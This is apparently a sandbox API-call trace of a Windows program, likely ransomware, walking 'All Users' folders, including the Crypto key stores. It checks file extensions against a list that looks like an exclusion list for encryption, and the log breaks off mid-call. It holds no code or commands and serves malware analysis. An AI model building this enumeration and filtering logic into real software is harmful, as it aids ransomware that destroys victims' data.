CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\", cchLength=0x19 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\") returned 0x19 [0107.652] FindFirstFileW 
(in: lpFileName="C:\\Users\\All Users\\Adobe\\*.*", lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0x1c9688 [0107.717] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0107.717] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW 
(in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\") returned 0x21 [0107.717] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0107.718] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0107.718] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0107.718] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\", cchLength=0x26 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\10.0\\") returned 0x26 [0107.718] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\", cchLength=0x26 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\10.0\\") returned 
0x26 [0107.718] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0107.718] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.718] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.718] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0107.719] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0107.719] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0107.719] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*", lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0x1c8028 [0107.761] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.762] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, 
lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 1 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, 
lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, 
lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, 
lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="ANI", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0107.763] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0 [0107.764] FindClose (in: hFindFile=0x1c8028 | out: hFindFile=0x1c8028) returned 1 [0107.764] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0107.764] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0107.764] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0107.764] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0107.764] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0107.764] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0107.764] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0107.764] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0107.764] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.764] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.764] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Desktop\\*.*", lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0xffffffff [0107.764] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0107.764] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.764] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Documents\\*.*", lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0xffffffff [0107.765] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0107.765] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: 
lpFindFileData=0x12f418) returned 1 [0107.765] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Favorites\\*.*", lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0xffffffff [0107.765] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0107.765] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.765] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\*.*", lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0x1c9688 [0107.765] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0107.765] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0107.765] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0107.765] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0107.765] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0107.765] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0107.766] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.766] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.766] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0107.853] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0107.853] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: 
lpFindFileData=0x12e908) returned 1 [0107.853] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*", lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0x1c8028 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0 [0107.921] FindClose (in: hFindFile=0x1c8028 | out: hFindFile=0x1c8028) returned 1 [0107.922] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0107.922] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0107.922] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0107.922] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0107.922] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0107.922] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0107.922] FindNextFileW (in: 
hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0107.922] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0107.923] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0107.923] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0107.923] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0107.923] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.923] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.923] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0107.961] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0107.961] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0107.961] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0107.961] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0107.961] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0107.962] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0107.962] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0107.962] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 
[0107.962] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0107.962] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0107.962] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0107.962] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0107.962] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.962] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.962] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0107.962] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0107.962] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0107.963] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0107.963] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.963] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0108.038] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.038] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.038] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0108.038] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0108.038] FindNextFileW (in: hFindFile=0x1c7fa8, 
